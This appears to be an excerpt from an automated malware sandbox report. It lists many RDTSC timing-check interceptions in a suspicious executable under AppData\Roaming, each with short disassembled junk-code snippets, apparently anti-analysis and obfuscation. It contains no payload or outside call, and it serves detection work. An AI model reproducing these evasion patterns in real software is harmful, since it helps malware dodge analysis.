Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A6B5B second address: 9A6B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A6B5F second address: 9A6B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5828704A78h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5828704A71h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9A6B8E second address: 9A6BC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC315h 0x00000007 push edi 0x00000008 jg 00007F5828CEC306h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5828CEC318h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 92C64F second address: 92C658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD5DD second address: 9AD5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD5E1 second address: 9AD5F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnp 00007F5828704A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD5F0 second address: 9AD5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5828CEC306h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD149 second address: 9AD16B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A78h 0x00000007 jnc 00007F5828704A66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD16B second address: 9AD1AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC310h 0x00000007 jmp 00007F5828CEC313h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5828CEC316h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD303 second address: 9AD30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5828704A66h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9AD30D second address: 9AD311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B078F second address: 9B07AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5828704A75h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B07AE second address: 9B07D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F5828CEC317h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9291AF second address: 9291B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B00DE second address: 9B010B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC318h 0x00000007 jmp 00007F5828CEC30Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B0233 second address: 9B0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B4568 second address: 9B4572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F5828CEC306h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B3C44 second address: 9B3C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5828704A6Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B41EB second address: 9B41EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B41EF second address: 9B4203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F5828704A72h 0x0000000c jns 00007F5828704A66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B4203 second address: 9B4214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5828CEC30Bh 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B4214 second address: 9B4218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B7BBC second address: 9B7BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B7BC0 second address: 9B7BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A73h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B7BD9 second address: 9B7BE3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5828CEC312h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9B7BE3 second address: 9B7BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BD838 second address: 9BD852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC315h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BD9C4 second address: 9BD9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BDB98 second address: 9BDBC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 jg 00007F5828CEC312h 0x0000000d jns 00007F5828CEC306h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BDCEF second address: 9BDD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F5828704A6Fh 0x0000000b popad 0x0000000c pop ebx 0x0000000d ja 00007F5828704A86h 0x00000013 jmp 00007F5828704A76h 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BDE96 second address: 9BDE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BDE9B second address: 9BDEC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5828704A78h 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F5828704A66h 0x00000010 jno 00007F5828704A66h 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BDEC3 second address: 9BDEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C13F second address: 96C153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C153 second address: 96C159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C159 second address: 96C15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96C15D second address: 96C199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC310h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F5828CEC318h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5828CEC30Ah 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BE300 second address: 9BE31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5828704A79h 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BE31F second address: 9BE323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BEC48 second address: 9BEC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9BEC4C second address: 9BEC57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C75C5 second address: 9C75E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F5828704A73h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C75E4 second address: 9C7600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC310h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F5828CEC31Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C568E second address: 9C5692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C5BFA second address: 9C5C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5828CEC317h 0x0000000a push eax 0x0000000b jmp 00007F5828CEC313h 0x00000010 jmp 00007F5828CEC30Ch 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C5C3A second address: 9C5C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C5C46 second address: 9C5C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C5C4C second address: 9C5C5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F5828704A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C62A8 second address: 9C62AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9C7012 second address: 9C7023 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CBE78 second address: 9CBEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5828CEC30Fh 0x0000000a jmp 00007F5828CEC315h 0x0000000f pushad 0x00000010 jo 00007F5828CEC306h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5828CEC313h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CBEC4 second address: 9CBED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5828704A66h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CBED2 second address: 9CBED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CF256 second address: 9CF25F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CF6B8 second address: 9CF6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CF6BD second address: 9CF6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828704A75h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F5828704A6Ch 0x00000014 pushad 0x00000015 popad 0x00000016 jl 00007F5828704A66h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CF6F2 second address: 9CF6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CFA99 second address: 9CFAA4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CFAA4 second address: 9CFAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CFAA9 second address: 9CFAAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9CFAAE second address: 9CFADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push ecx 0x00000008 jc 00007F5828CEC306h 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007F5828CEC320h 0x00000019 jmp 00007F5828CEC30Ch 0x0000001e je 00007F5828CEC30Eh 0x00000024 push esi 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7CA2 second address: 9D7CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5828704A79h 0x0000000a pop ebx 0x0000000b jbe 00007F5828704A89h 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F5828704A66h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7CCF second address: 9D7CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7E3D second address: 9D7E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5828704A66h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push edx 0x0000000f jne 00007F5828704A66h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7F96 second address: 9D7F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7F9A second address: 9D7F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7F9E second address: 9D7FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7FA6 second address: 9D7FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F5828704A66h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5828704A78h 0x00000015 jng 00007F5828704A66h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7FD4 second address: 9D7FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D8AF9 second address: 9D8AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D8AFF second address: 9D8B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D8B04 second address: 9D8B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5828704A66h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D8B0E second address: 9D8B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D91B1 second address: 9D91E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5828704A79h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5828704A77h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D91E7 second address: 9D91EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9D7185 second address: 9D718A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9DED4C second address: 9DED50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9DED50 second address: 9DED54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9EBCF1 second address: 9EBCFB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828CEC306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9EBCFB second address: 9EBD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F5828704A66h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9EB99B second address: 9EB9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9EB9A1 second address: 9EB9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828704A77h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9EF510 second address: 9EF52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC30Fh 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jns 00007F5828CEC306h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A011C5 second address: A011C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A011C9 second address: A011ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC315h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A09634 second address: A0963F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A0963F second address: A0966A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007F5828CEC306h 0x0000000c jne 00007F5828CEC306h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F5828CEC311h 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A07EE3 second address: A07EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A07EE9 second address: A07EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A0802E second address: A08036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A08036 second address: A08047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F5828CEC30Ch 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: A0DB51 second address: A0DB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5828704A73h 0x0000000a rdtsc
